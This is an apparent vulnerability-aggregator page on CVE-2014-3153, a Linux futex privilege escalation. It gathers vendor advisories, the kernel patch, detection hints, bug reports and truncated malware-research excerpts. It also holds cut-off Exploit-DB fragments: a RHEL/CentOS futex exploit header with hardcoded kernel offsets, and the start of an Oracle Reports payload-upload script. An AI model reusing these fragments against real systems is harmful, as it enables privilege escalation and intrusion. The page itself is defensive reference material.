CVE-2014-3153
published 2014-06-07CVE-2014-3153: The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows…
PriorityP190high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-15
Exploited in the wild
EPSS
37.23%
98.4th percentile
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
Affected
21 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | linux | < linux 3.14.5-1 (bookworm) | linux 3.14.5-1 (bookworm) |
| linux | linux_kernel | < 3.2.60 | 3.2.60 |
| linux | linux_kernel | >= 0 < 3.14.5-1 | 3.14.5-1 |
| linux | linux_kernel | >= 0 < 3.14.5-1 | 3.14.5-1 |
| linux | linux_kernel | >= 0 < 3.14.5-1 | 3.14.5-1 |
| linux | linux_kernel | >= 0 < 3.14.5-1 | 3.14.5-1 |
| linux | linux_kernel | >= 0 < 3.13.0-29.53 | 3.13.0-29.53 |
| linux | linux_kernel | >= 3.11 < 3.12.22 | 3.12.22 |
| linux | linux_kernel | >= 3.13 < 3.14.6 | 3.14.6 |
| linux | linux_kernel | >= 3.3 < 3.4.92 | 3.4.92 |
| linux | linux_kernel | >= 3.5 < 3.10.42 | 3.10.42 |
| opensuse | opensuse | — | — |
| oracle | linux | — | — |
| oracle | linux | — | — |
| redhat | enterprise_linux_server_aus | — | — |
| suse | linux_enterprise_desktop | — | — |
| suse | linux_enterprise_high_availability_extension | — | — |
| suse | linux_enterprise_real_time_extension | — | — |
| suse | linux_enterprise_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation of CVE-2014-3153 (TowelRoot/futex) by monitoring for concurrent FUTEX_WAIT_REQUEUE_PI and FUTEX_CMP_REQUEUE_PI syscalls from the same process using the same futex address for both arguments — the vulnerability requires two different futex addresses but the exploit passes the same address. ↗
- →Flag Android devices where a process injects code into the Zygote process — this is a post-exploitation technique used after CVE-2014-3153 rooting, and is the first adware technique of this kind observed in the wild. ↗
- →Any Android device with a kernel built before June 2014 should be considered vulnerable to CVE-2014-3153; use kernel build date as a triage filter when assessing exposure. ↗
- →In the CentOS/RHEL exploit for CVE-2014-3153, the exploit binary opens a local listener on port 5551 (LOCAL_PORT); monitor for unexpected local privilege-escalation binaries binding to this port. ↗
- ·The Skygofree exploit payload uses a SQLite database (device.db) with hardcoded memory offsets for 205 specific device models; exploitation success is device-model-dependent and the exploit attempts programmatic address discovery if the device is not listed. ↗
- ·The Skygofree exploit payload targeting CVE-2014-3153 is based on the public android-rooting-tools project source code, meaning detection signatures derived from that project's code will also match this malware. ↗
- ·The CopyCat malware avoids targeting Chinese devices, so absence of infections in China should not be used as an indicator of non-infection elsewhere; this geo-exclusion is a deliberate evasion tactic. ↗
- ·The RHEL/CentOS exploit for CVE-2014-3153 uses hardcoded kernel struct offsets (OFFSET_PID 0x4A4, OFFSET_REAL_PARENT 0x4B8, OFFSET_CRED 0x668, SIZEOF_TASK_STRUCT 2912) that are specific to the targeted kernel version and will not work reliably across different kernel builds. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.8HIGH
vulncheck7.8HIGH
cisa7.8HIGH
vendor_debian7.8HIGH
vendor_redhat7.8HIGH
vendor_ubuntu6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Linux Kernel Privilege Escalation Vulnerability
cisa·2022-05-25·CVSS 7.8
CVE-2014-3153 [HIGH] CWE-269 Linux Kernel Privilege Escalation Vulnerability
Vulnerability: Linux Kernel Privilege Escalation Vulnerability
Affected: Linux Kernel
The futex_requeue function in kernel/futex.c in Linux kernel does not ensure that calls have two different futex addresses, which allows local users to gain privileges.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-3153
Remediation Due Date: 2022-06-15
Ubuntu
Linux kernel (Trusty HWE) vulnerabilities
vendor_ubuntu·2014-06-27·CVSS 5.5
CVE-2014-0077 [MEDIUM] Linux kernel (Trusty HWE) vulnerabilities
Title: Linux kernel (Trusty HWE) vulnerabilities
Summary: Several security issues were fixed in the kernel.
A flaw was discovered in the Linux kernel's pseudo tty (pty) device. An
unprivileged user could exploit this flaw to cause a denial of service
(system crash) or potentially gain administrator privileges.
(CVE-2014-0196)
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
Matthew Daley reported an information leak in the floppy disk driver of the
Linux kernel. An unprivileged local user could exploit this flaw to obtain
potentially sensitive information from kernel memory. (CVE-2014-1738)
Matthew Daley reported a flaw in
Ubuntu
Linux kernel (OMAP4) vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 5.5
CVE-2014-0055 [MEDIUM] Linux kernel (OMAP4) vulnerabilities
Title: Linux kernel (OMAP4) vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
A flaw was discovered in the vhost-net subsystem of the Linux kernel. Guest
OS users could exploit this flaw to cause a denial of service (host OS
crash). (CVE-2014-0055)
Sasha Levin reported a bug in the Linux kernel's virtual memory management
subsystem. An unprivileged local user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-3122)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary chang
Ubuntu
Linux kernel (Quantal HWE) vulnerability
vendor_ubuntu·2014-06-05
CVE-2014-3153 Linux kernel (Quantal HWE) vulnerability
Title: Linux kernel (Quantal HWE) vulnerability
Summary: The system could be made to crash or run programs as an administrator.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges.
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
Ubuntu
Linux kernel (Saucy HWE) vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 5.5
CVE-2014-0155 [MEDIUM] Linux kernel (Saucy HWE) vulnerabilities
Title: Linux kernel (Saucy HWE) vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
A flaw was discovered in the Linux kernel virtual machine's (kvm)
validation of interrupt requests (irq). A guest OS user could exploit this
flaw to cause a denial of service (host OS crash). (CVE-2014-0155)
An information leak was discovered in the netfilter subsystem of the Linux
kernel. An attacker could exploit this flaw to obtain sensitive information
from kernel memory. (CVE-2014-2568)
Sasha Levin reported a bug in the Linux kernel's virtual memory management
subs
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 2.9
CVE-2014-2568 [LOW] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
An information leak was discovered in the netfilter subsystem of the Linux
kernel. An attacker could exploit this flaw to obtain sensitive information
from kernel memory. (CVE-2014-2568)
Sasha Levin reported a bug in the Linux kernel's virtual memory management
subsystem. An unprivileged local user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-3122)
Instructions: After a standard system update you need to reboot your computer to make
all the necessa
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 5.5
CVE-2014-0055 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
A flaw was discovered in the vhost-net subsystem of the Linux kernel. Guest
OS users could exploit this flaw to cause a denial of service (host OS
crash). (CVE-2014-0055)
Sasha Levin reported a bug in the Linux kernel's virtual memory management
subsystem. An unprivileged local user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-3122)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATT
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 5.5
CVE-2014-0155 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
A flaw was discovered in the Linux kernel virtual machine's (kvm)
validation of interrupt requests (irq). A guest OS user could exploit this
flaw to cause a denial of service (host OS crash). (CVE-2014-0155)
An information leak was discovered in the netfilter subsystem of the Linux
kernel. An attacker could exploit this flaw to obtain sensitive information
from kernel memory. (CVE-2014-2568)
Sasha Levin reported a bug in the Linux kernel's virtual memory management
subsystem. An un
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 6.1
CVE-2013-4387 [MEDIUM] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
Dmitry Vyukov reported a flaw in the Linux kernel's handling of IPv6 UDP
Fragmentation Offload (UFO) processing. A remote attacker could leverage
this flaw to cause a denial of service (system crash). (CVE-2013-4387)
Hannes Frederic Sowa discovered a flaw in the Linux kernel's UDP
Fragmentation Offload (UFO). An unprivileged local user could exploit this
flaw to cause a denial of service (system crash) or possibly gain
administrative privileges. (CVE-2013-4470)
A flaw was discovere
Ubuntu
Linux kernel (Raring HWE) vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 4.9
CVE-2013-4483 [MEDIUM] Linux kernel (Raring HWE) vulnerabilities
Title: Linux kernel (Raring HWE) vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
A flaw was discovered in the Linux kernel's IPC reference counting. An
unprivileged local user could exploit this flaw to cause a denial of
service (OOM system crash). (CVE-2013-4483)
Instructions: After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel module
Ubuntu
Linux kernel (EC2) vulnerabilities
vendor_ubuntu·2014-06-05·CVSS 6.1
CVE-2013-4387 [MEDIUM] Linux kernel (EC2) vulnerabilities
Title: Linux kernel (EC2) vulnerabilities
Summary: Several security issues were fixed in the kernel.
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
Dmitry Vyukov reported a flaw in the Linux kernel's handling of IPv6 UDP
Fragmentation Offload (UFO) processing. A remote attacker could leverage
this flaw to cause a denial of service (system crash). (CVE-2013-4387)
Hannes Frederic Sowa discovered a flaw in the Linux kernel's UDP
Fragmentation Offload (UFO). An unprivileged local user could exploit this
flaw to cause a denial of service (system crash) or possibly gain
administrative privileges. (CVE-2013-4470)
A flaw was dis
Red Hat
kernel: futex: pi futexes requeue issue
vendor_redhat·2014-06-04·CVSS 7.8
CVE-2014-3153 [HIGH] kernel: futex: pi futexes requeue issue
kernel: futex: pi futexes requeue issue
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
A flaw was found in the way the Linux kernel's futex subsystem handled the requeuing of certain Priority Inheritance (PI) futexes. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Statement: This issue did not affect the versions of the Linux kernel packages as shipped with Red Hat Enterprise Linux 5.
This issue requires local system access to be exploited. We are currently not aware of any working exploit for Red Hat Enterprise Linux 6 or Red
Debian
CVE-2014-3153: linux - The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 ...
vendor_debian·2014·CVSS 7.8
CVE-2014-3153 [HIGH] CVE-2014-3153: linux - The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 ...
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
Scope: local
bookworm: resolved (fixed in 3.14.5-1)
bullseye: resolved (fixed in 3.14.5-1)
forky: resolved (fixed in 3.14.5-1)
sid: resolved (fixed in 3.14.5-1)
trixie: resolved (fixed in 3.14.5-1)
GHSA
GHSA-5gr7-gr2q-52gp: The futex_requeue function in kernel/futex
ghsa_unreviewed·2022-05-13
CVE-2014-3153 [HIGH] CWE-269 GHSA-5gr7-gr2q-52gp: The futex_requeue function in kernel/futex
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
OSV
CVE-2014-3153: The futex_requeue function in kernel/futex
osv·2014-06-07·CVSS 7.8
CVE-2014-3153 [HIGH] CVE-2014-3153: The futex_requeue function in kernel/futex
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
OSV
linux vulnerabilities
osv·2014-06-05·CVSS 2.9
CVE-2014-3153 [LOW] linux vulnerabilities
linux vulnerabilities
Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An
unprivileged local user could exploit this flaw to cause a denial of
service (system crash) or gain administrative privileges. (CVE-2014-3153)
An information leak was discovered in the netfilter subsystem of the Linux
kernel. An attacker could exploit this flaw to obtain sensitive information
from kernel memory. (CVE-2014-2568)
Sasha Levin reported a bug in the Linux kernel's virtual memory management
subsystem. An unprivileged local user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-3122)
Kernel
futex-prevent-requeue-pi-on-same-futex.patch futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1)
kernel_security·2014-06-03·CVSS 7.8
CVE-2014-3153 [HIGH] futex-prevent-requeue-pi-on-same-futex.patch futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1)
futex-prevent-requeue-pi-on-same-futex.patch futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1)
If uaddr == uaddr2, then we have broken the rule of only requeueing from
a non-pi futex to a pi futex with this call. If we attempt this, then
dangling pointers may be left for rt_waiter resulting in an exploitable
condition.
This change brings futex_requeue() in line with futex_wait_requeue_pi()
which performs the same check as per commit 6f7b0a2a5c0f ("futex: Forbid
uaddr == uaddr2 in futex_wait_requeue_pi()")
[ tglx: Compare the resulting keys as well, as uaddrs might be
different depending on the mapping ]
Fixes CVE-2014-3153.
Reported-by: Pinkie Pie
Signed-off-by: Will Drewry
Signed-off-by: Kees Cook
Cc: [email protected]
Signed-off-by: Thomas Gleixner
Reviewed-by:
VulnCheck
Linux Kernel Privilege Escalation Vulnerability
vulncheck·2014·CVSS 7.8
CVE-2014-3153 [HIGH] CWE-269 Linux Kernel Privilege Escalation Vulnerability
Linux Kernel Privilege Escalation Vulnerability
The futex_requeue function in kernel/futex.c in Linux kernel does not ensure that calls have two different futex addresses, which allows local users to gain privileges.
Affected: Linux Kernel
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://resources.infosecinstitute.com/topic/the-hacking-team-hack-when-hackers-have-become-the-target/; https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/; https://cybersecurityworks.com/pdf/ransomware/Spotlight_Ransomware2021.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/406d42ee9247; https://vulncheck.com
Exploit-DB
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation
exploitdb·2014-11-25·CVSS 7.8
CVE-2014-3153 [HIGH] Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation
---
/*
* CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406
* By Kaiqu Chen ( [email protected] )
* Based on libfutex and the expoilt for Android by GeoHot.
*
* Usage:
* $gcc exploit.c -o exploit -lpthread
* $./exploit
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define ARRAY_SIZE(a) (sizeof (a) / sizeof (*(a)))
#define FUTEX_WAIT_REQUEUE_PI 11
#define FUTEX_CMP_REQUEUE_PI 12
#define USER_PRIO_BASE 120
#define LOCAL_PORT 5551
#define SIGNAL_HACK_KERNEL 12
#define SIGNAL_THREAD_EXIT 10
#define OFFSET_PID 0x4A4
#define OFFSET_REAL_PARENT 0x4B8
#define OFFSET_CRED 0x668
#define SIZEOF_CRED 160
#defin
Exploit-DB
Oracle Forms and Reports 11.1 - Arbitrary Code Execution
exploitdb·2014-01-29·CVSS 9.1
CVE-2012-3153 [CRITICAL] Oracle Forms and Reports 11.1 - Arbitrary Code Execution
Oracle Forms and Reports 11.1 - Arbitrary Code Execution
---
#!/usr/bin/env ruby
# Exploit Title: Oracle Reports 11.1
# About: Automated exploit for CVE-2012-3153/CVE-2012-3152
# Google Dork: inurl:/reports/rwservlet/
# Date: 01/28/2014
# Exploit Author: Mekanismen
# Credits to: @miss_sudo for initial disclosure
# Reference: http://netinfiltration.com/
# Vendor Homepage: http://www.oracle.com/
# Version: 11.1
# Tested on: Linux
# CVE-2012-3153
# CVE-2012-3152
require 'uri'
require 'open-uri'
require 'openssl'
#OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
def upload_payload(dest)
url = "#{@url}/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/#{dest}/images/#{@payload_name}+JOBTYPE=rwurl+URLPARAMETER='#{@payload_url}'"
#print url
begin
uri = URI.parse(url
Metasploit
Android 'Towelroot' Futex Requeue Kernel Exploit
metasploit
Android 'Towelroot' Futex Requeue Kernel Exploit
Android 'Towelroot' Futex Requeue Kernel Exploit
This module exploits a bug in futex_requeue in the Linux kernel, using similar techniques employed by the towelroot exploit. Any Android device with a kernel built before June 2014 is likely to be vulnerable.
Securelist
Skygofree: Following in the footsteps of HackingTeam
blogs_securelist·2018-01-16
Skygofree: Following in the footsteps of HackingTeam
Table of Contents
Malware Features
Android
Reverse shell payload
Exploit payload
Busybox payload
Social payload
Parser payload
Windows
Code similarities
Distribution
Artifacts
Conclusions
Notes
Authors
Nikita Buchka
Alexey Firsh
At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specif
Securelist
Skygofree: Following in the footsteps of HackingTeam
blogs_securelist·2018-01-16
Skygofree: Following in the footsteps of HackingTeam
Table of Contents
- Malware Features
- Distribution
- Artifacts
- Conclusions
Authors
- Nikita Buchka
- Alexey Firsh
At the beginning of October 2017, we discovered new Android spyware with several features previously unseen in the wild. In the course of further research, we found a number of related samples that point to a long-term development process. We believe the initial versions of this malware were created at least three years ago – at the end of 2014. Since then, the implant’s functionality has been improving and remarkable new features implemented, such as the ability to record audio surroundings via the microphone when an infected device is in a specified location; the stealing of WhatsApp messages via Accessibility Services; and the ability to connect an infected device to
Checkpoint
How the CopyCat malware infected Android devices around the world
blogs_checkpoint·2017-07-06
CVE-2014-4321 How the CopyCat malware infected Android devices around the world
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## How the CopyCat malware infected Android devices around the world
Check Point researchers identified a mobile malware that infected 14 million Android devices, rooting approximately 8 mill
Checkpoint
More Than 1 Million Google Accounts Breached by Gooligan
blogs_checkpoint·2016-11-30
CVE-2013-6282 More Than 1 Million Google Accounts Breached by Gooligan
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## More Than 1 Million Google Accounts Breached by Gooligan
November 30, 2016
As a result of a lot of hard work done by our security research teams, we revealed today a new and alarming malw
arXiv
Automated Deobfuscation of Android Native Binary Code
arxiv_fulltext·2020-03-16
Automated Deobfuscation of Android Native Binary Code
plain
Automated Deobfuscation of Android Native Binary Code
DiANa
Zeliang Kan, Haoyu Wang
Beijing University of Posts and Telecommunications
Lei Wu
Zhejiang University
Yao Guo
Peking University
Daniel Xiapu Luo
The Hong Kong Polytechnic University
## Abstract
With the popularity of Android apps, different techniques have been proposed to enhance app protection. As an effective approach to prevent reverse engineering, obfuscation can be used to serve both benign and malicious purposes. In recent years, more and more sensitive logic or data have been implemented as obfuscated native code because of the limitations of Java bytecode. As a result, native code obfuscation becomes a great obstacle for security analysis to understand the complicated logic. In this paper, we propose DiANa, a
Bugzilla
CVE-2014-3153 - Local root vulnerability in Linux kernel futex(2) implementation
bugzilla·2014-06-18·CVSS 7.8
CVE-2014-3153 [HIGH] CVE-2014-3153 - Local root vulnerability in Linux kernel futex(2) implementation
CVE-2014-3153 - Local root vulnerability in Linux kernel futex(2) implementation
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153
Apparently, this is what the TowelRoot uses to obtain root access on Android. I was able to use TowelRoot to gain root access on my 4.4.3 Android Nexus 5.
Looks like a kernel patch is needed.
The appears to affect all kernels upto and including 3.14.5
This email thread has patches attached to it:
http://seclists.org/oss-sec/2014/q2/467
Discussion:
We're actively propagating this fix to the CAF kernel branches including the Firefox OS branches already. No action required in this bug for CAF.
---
:'(
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/SandboxFilter.cpp#106
---
(In reply to Paul Theriault [:pauljt] from c
Bugzilla
CVE-2014-3153 kernel: futex: pi futexes requeue issue [fedora-all]
bugzilla·2014-06-06·CVSS 7.8
CVE-2014-3153 [HIGH] CVE-2014-3153 kernel: futex: pi futexes requeue issue [fedora-all]
CVE-2014-3153 kernel: futex: pi futexes requeue issue [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, use the bodhi submission link noted
in the next comment(s). This will include the bug IDs of this tracking
bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
NOTE: this issue affects multiple supported v
Bugzilla
CVE-2014-3153 kernel: futex: pi futexes requeue issue
bugzilla·2014-06-02·CVSS 7.8
CVE-2014-3153 [HIGH] CVE-2014-3153 kernel: futex: pi futexes requeue issue
CVE-2014-3153 kernel: futex: pi futexes requeue issue
A flaw was found in the way pi to pi futex requeueing was handled.
A local unprivileged user can use this flaw to increase their privileges on the system.
Discussion:
Acknowledgements:
Red Hat would like to thank Kees Cook of Google for reporting this issue. Google acknowledges Pinkie Pie as the original reporter.
---
Statement:
This issue did not affect the versions of the Linux kernel packages as shipped with Red Hat Enterprise Linux 5.
This issue requires local system access to be exploited. We are currently not aware of any working exploit for Red Hat Enterprise Linux 6 or Red Hat Enterprise MRG 2.
---
Upstream commits:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e9c243a5a6de0be8e584c604d35
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=e9c243a5a6de0be8e584c604d353412584b592f8http://linux.oracle.com/errata/ELSA-2014-0771.htmlhttp://linux.oracle.com/errata/ELSA-2014-3037.htmlhttp://linux.oracle.com/errata/ELSA-2014-3038.htmlhttp://linux.oracle.com/errata/ELSA-2014-3039.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-06/msg00014.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-06/msg00018.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-06/msg00025.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-07/msg00006.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00006.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00007.htmlhttp://openwall.com/lists/oss-security/2014/06/05/24http://openwall.com/lists/oss-security/2014/06/06/20http://rhn.redhat.com/errata/RHSA-2014-0800.htmlhttp://secunia.com/advisories/58500http://secunia.com/advisories/58990http://secunia.com/advisories/59029http://secunia.com/advisories/59092http://secunia.com/advisories/59153http://secunia.com/advisories/59262http://secunia.com/advisories/59309http://secunia.com/advisories/59386http://secunia.com/advisories/59599http://www.debian.org/security/2014/dsa-2949http://www.exploit-db.com/exploits/35370http://www.openwall.com/lists/oss-security/2014/06/05/22http://www.openwall.com/lists/oss-security/2021/02/01/4http://www.securityfocus.com/bid/67906http://www.securitytracker.com/id/1030451http://www.ubuntu.com/usn/USN-2237-1http://www.ubuntu.com/usn/USN-2240-1https://bugzilla.redhat.com/show_bug.cgi?id=1103626https://elongl.github.io/exploitation/2021/01/08/cve-2014-3153.htmlhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=13fbca4c6ecd96ec1a1cfa2e4f2ce191fe928a5ehttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=54a217887a7b658e2650c3feff22756ab80c7339https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b3eaa9fc5cd0a4d74b18f6b8dc617aeaf1873270https://github.com/elongl/CVE-2014-3153https://github.com/torvalds/linux/commit/e9c243a5a6de0be8e584c604d353412584b592f8https://www.openwall.com/lists/oss-security/2021/02/01/4http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=e9c243a5a6de0be8e584c604d353412584b592f8http://linux.oracle.com/errata/ELSA-2014-0771.htmlhttp://linux.oracle.com/errata/ELSA-2014-3037.htmlhttp://linux.oracle.com/errata/ELSA-2014-3038.htmlhttp://linux.oracle.com/errata/ELSA-2014-3039.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-06/msg00014.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-06/msg00018.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-06/msg00025.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-07/msg00006.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00006.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00007.htmlhttp://openwall.com/lists/oss-security/2014/06/05/24http://openwall.com/lists/oss-security/2014/06/06/20http://rhn.redhat.com/errata/RHSA-2014-0800.htmlhttp://secunia.com/advisories/58500http://secunia.com/advisories/58990http://secunia.com/advisories/59029http://secunia.com/advisories/59092http://secunia.com/advisories/59153http://secunia.com/advisories/59262http://secunia.com/advisories/59309http://secunia.com/advisories/59386http://secunia.com/advisories/59599http://www.debian.org/security/2014/dsa-2949http://www.exploit-db.com/exploits/35370http://www.openwall.com/lists/oss-security/2014/06/05/22http://www.openwall.com/lists/oss-security/2021/02/01/4http://www.securityfocus.com/bid/67906http://www.securitytracker.com/id/1030451http://www.ubuntu.com/usn/USN-2237-1http://www.ubuntu.com/usn/USN-2240-1https://bugzilla.redhat.com/show_bug.cgi?id=1103626https://elongl.github.io/exploitation/2021/01/08/cve-2014-3153.htmlhttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=13fbca4c6ecd96ec1a1cfa2e4f2ce191fe928a5ehttps://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=54a217887a7b658e2650c3feff22756ab80c7339https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b3eaa9fc5cd0a4d74b18f6b8dc617aeaf1873270https://github.com/elongl/CVE-2014-3153https://github.com/torval